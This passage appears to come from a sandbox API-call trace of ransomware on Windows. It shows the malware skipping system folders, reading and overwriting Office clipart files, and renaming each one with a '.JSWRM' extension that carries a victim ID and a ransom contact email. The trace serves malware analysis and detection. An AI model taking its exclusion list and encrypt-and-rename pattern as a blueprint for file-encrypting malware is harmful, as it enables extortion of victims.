[0096.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0096.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0096.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0096.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.075] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00390_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00390_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00390_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0096.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0096.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0096.076] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x828, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00391_.WMF", cAlternateFileName="")) returned 1 [0096.076] lstrcmpiW (lpString1="SO00391_.WMF", lpString2=".") returned 1 [0096.076] lstrcmpiW (lpString1="SO00391_.WMF", lpString2="..") returned 1 [0096.076] lstrcmpiW (lpString1="SO00391_.WMF", lpString2="...") returned 1 [0096.076] lstrcmpiW (lpString1="SO00391_.WMF", lpString2="windows") returned -1 [0096.076] lstrcmpiW (lpString1="SO00391_.WMF", lpString2="recovery") returned 1 [0096.076] lstrcmpiW (lpString1="SO00391_.WMF", lpString2="perflogs") returned 1 [0096.076] lstrcmpiW (lpString1="SO00391_.WMF", lpString2="documents and settings") returned 1 [0096.076] lstrcmpiW (lpString1="SO00391_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.076] lstrcmpiW (lpString1="SO00391_.WMF", lpString2="system volume information") returned -1 [0096.076] lstrcmpiW (lpString1="SO00391_.WMF", lpString2="msocache") returned 1 [0096.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0096.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00391_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00391_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00391_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0096.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0096.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00391_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00391_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00391_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0096.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0096.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0096.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0096.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00391_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00391_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.077] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2088) returned 1 [0096.077] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x820) returned 0x20c6c0 [0096.077] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x820, lpOverlapped=0x0) returned 1 [0096.079] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.079] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x820, lpOverlapped=0x0) returned 1 [0096.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0096.079] CloseHandle (hObject=0x314) returned 1 [0096.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0096.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0096.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0096.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0096.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0096.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0096.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0096.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0096.080] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00391_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00391_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00391_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00391_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0096.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0096.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0096.080] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x704e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00416_.WMF", cAlternateFileName="")) returned 1 [0096.080] lstrcmpiW (lpString1="SO00416_.WMF", lpString2=".") returned 1 [0096.080] lstrcmpiW (lpString1="SO00416_.WMF", lpString2="..") returned 1 [0096.080] lstrcmpiW (lpString1="SO00416_.WMF", lpString2="...") returned 1 [0096.081] lstrcmpiW (lpString1="SO00416_.WMF", lpString2="windows") returned -1 [0096.081] lstrcmpiW (lpString1="SO00416_.WMF", lpString2="recovery") returned 1 [0096.081] lstrcmpiW (lpString1="SO00416_.WMF", lpString2="perflogs") returned 1 [0096.081] lstrcmpiW (lpString1="SO00416_.WMF", lpString2="documents and settings") returned 1 [0096.081] lstrcmpiW (lpString1="SO00416_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.081] lstrcmpiW (lpString1="SO00416_.WMF", lpString2="system volume information") returned -1 [0096.081] lstrcmpiW (lpString1="SO00416_.WMF", lpString2="msocache") returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0096.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00416_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00416_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00416_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0096.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00416_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00416_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00416_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0096.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0096.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0096.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0096.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00416_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00416_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.082] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28750) returned 1 [0096.082] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7040) returned 0x24d210 [0096.082] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7040, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7040, lpOverlapped=0x0) returned 1 [0096.085] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.085] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7040, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7040, lpOverlapped=0x0) returned 1 [0096.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.086] CloseHandle (hObject=0x314) returned 1 [0096.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0096.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0096.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0096.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0096.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0096.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0096.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.087] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00416_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00416_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00416_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00416_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0096.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0096.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0096.087] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x143c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00423_.WMF", cAlternateFileName="")) returned 1 [0096.087] lstrcmpiW (lpString1="SO00423_.WMF", lpString2=".") returned 1 [0096.087] lstrcmpiW (lpString1="SO00423_.WMF", lpString2="..") returned 1 [0096.087] lstrcmpiW (lpString1="SO00423_.WMF", lpString2="...") returned 1 [0096.087] lstrcmpiW (lpString1="SO00423_.WMF", lpString2="windows") returned -1 [0096.087] lstrcmpiW (lpString1="SO00423_.WMF", lpString2="recovery") returned 1 [0096.088] lstrcmpiW (lpString1="SO00423_.WMF", lpString2="perflogs") returned 1 [0096.088] lstrcmpiW (lpString1="SO00423_.WMF", lpString2="documents and settings") returned 1 [0096.088] lstrcmpiW (lpString1="SO00423_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.088] lstrcmpiW (lpString1="SO00423_.WMF", lpString2="system volume information") returned -1 [0096.088] lstrcmpiW (lpString1="SO00423_.WMF", lpString2="msocache") returned 1 [0096.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0096.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00423_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00423_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00423_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0096.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0096.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00423_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00423_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00423_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0096.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0096.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0096.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0096.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00423_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00423_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.089] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5180) returned 1 [0096.089] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1430) returned 0x205850 [0096.089] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1430, lpOverlapped=0x0) returned 1 [0096.091] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.091] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1430, lpOverlapped=0x0) returned 1 [0096.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.091] CloseHandle (hObject=0x314) returned 1 [0096.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0096.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0096.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0096.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0096.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0096.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0096.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.092] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00423_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00423_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00423_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00423_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0096.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0096.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0096.093] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1544, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00444_.WMF", cAlternateFileName="")) returned 1 [0096.093] lstrcmpiW (lpString1="SO00444_.WMF", lpString2=".") returned 1 [0096.093] lstrcmpiW (lpString1="SO00444_.WMF", lpString2="..") returned 1 [0096.093] lstrcmpiW (lpString1="SO00444_.WMF", lpString2="...") returned 1 [0096.093] lstrcmpiW (lpString1="SO00444_.WMF", lpString2="windows") returned -1 [0096.093] lstrcmpiW (lpString1="SO00444_.WMF", lpString2="recovery") returned 1 